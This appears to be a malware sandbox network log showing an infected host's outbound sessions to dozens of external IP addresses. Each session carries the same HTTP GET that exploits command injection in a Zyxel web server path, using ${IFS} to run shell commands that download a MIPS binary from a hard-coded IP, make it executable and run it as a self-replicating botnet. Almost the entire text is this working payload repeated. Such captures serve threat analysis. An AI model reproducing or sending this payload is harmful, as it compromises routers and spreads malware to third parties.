                                            Jan 14, 2024 15:50:52.670473099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7778192.168.2.2340406157.138.160.129443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.670490026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7779192.168.2.2344158113.34.33.73443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.670519114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7780192.168.2.2353968203.14.96.91443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.670520067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7781192.168.2.2343214137.39.219.165443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.670569897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7782192.168.2.2355684104.135.81.43443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.670594931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7783192.168.2.2345968171.250.49.191443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.670613050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7784192.168.2.2338850210.224.74.89443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.670640945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7785192.168.2.2348304185.232.126.237443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.670711994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7786192.168.2.2334596169.12.207.194443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.670742035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7787192.168.2.2337140193.249.27.112443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.670747042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7788192.168.2.2345238129.45.164.88443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.670756102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7789192.168.2.233418059.210.28.128443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.670762062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7790192.168.2.2356732118.51.72.29443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.670823097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7791192.168.2.2353932161.255.190.58443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.670854092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7792192.168.2.235295243.241.11.68443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.670912027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7793192.168.2.235625439.21.92.91443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.670969009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7794192.168.2.2334124163.156.55.141443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.670969009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7795192.168.2.2344938188.80.130.225443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.670999050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7796192.168.2.235488642.203.96.51443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.671034098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7797192.168.2.234547452.133.56.53443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.671077967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7798192.168.2.2348794151.129.188.200443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.671080112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7799192.168.2.2353702134.7.17.72443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.671107054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7800192.168.2.233559480.33.222.158443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.671133995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7801192.168.2.2346288145.114.152.216443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.671175003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7802192.168.2.233701468.152.227.12443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.671222925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7803192.168.2.2335730106.112.228.206443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.671242952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7804192.168.2.2348898120.205.246.211443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.671279907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7805192.168.2.2352032178.203.111.177443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.671308041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7806192.168.2.234685062.60.141.228443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.671339035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7807192.168.2.2340134126.63.44.27443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.671366930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7808192.168.2.235638470.61.28.192443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.671392918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7809192.168.2.2340200203.56.210.99443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.671436071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7810192.168.2.2360962181.179.66.109443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.671442032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7811192.168.2.2339660159.206.57.240443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.671451092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7812192.168.2.2347064120.40.94.107443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.671467066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7813192.168.2.2359436188.120.168.178443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.671500921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7814192.168.2.2339602107.114.147.15443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.671561956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7815192.168.2.234578268.20.70.186443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.671595097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7816192.168.2.235281289.243.11.20443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.671614885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7817192.168.2.235058051.139.24.51443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.671658993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7818192.168.2.235338684.168.232.15443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.671678066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7819192.168.2.2346446143.234.137.109443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.671701908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7820192.168.2.2343774213.183.63.177443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.671739101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7821192.168.2.2348058175.238.54.47443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.671762943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7822192.168.2.234530618.141.242.202443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.671775103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7823192.168.2.233511446.232.74.125443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.671807051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7824192.168.2.2346956146.205.127.112443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.671833038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7825192.168.2.234950299.244.238.91443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.671873093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7826192.168.2.235487076.89.121.182443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.671921015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7827192.168.2.2357674165.197.118.73443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.671922922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7828192.168.2.2335066140.78.140.53443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.671940088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7829192.168.2.2349028139.119.134.170443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.671964884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7830192.168.2.235334437.166.68.31443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.672014952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7831192.168.2.2332984114.140.85.23443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.672027111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7832192.168.2.2339466212.211.205.235443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.672034025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7833192.168.2.2354202120.133.99.70443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.672071934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7834192.168.2.2359082184.215.78.28443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.672097921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7835192.168.2.2342330171.235.29.95443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.672127962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7836192.168.2.2333834176.128.173.132443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.672157049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7837192.168.2.235013088.200.91.187443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.672178030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7838192.168.2.2339866205.213.71.93443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.672209978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7839192.168.2.234861066.249.61.223443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.672238111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7840192.168.2.233708639.22.216.49443
                                            TimestampBytes transferredDirectionData
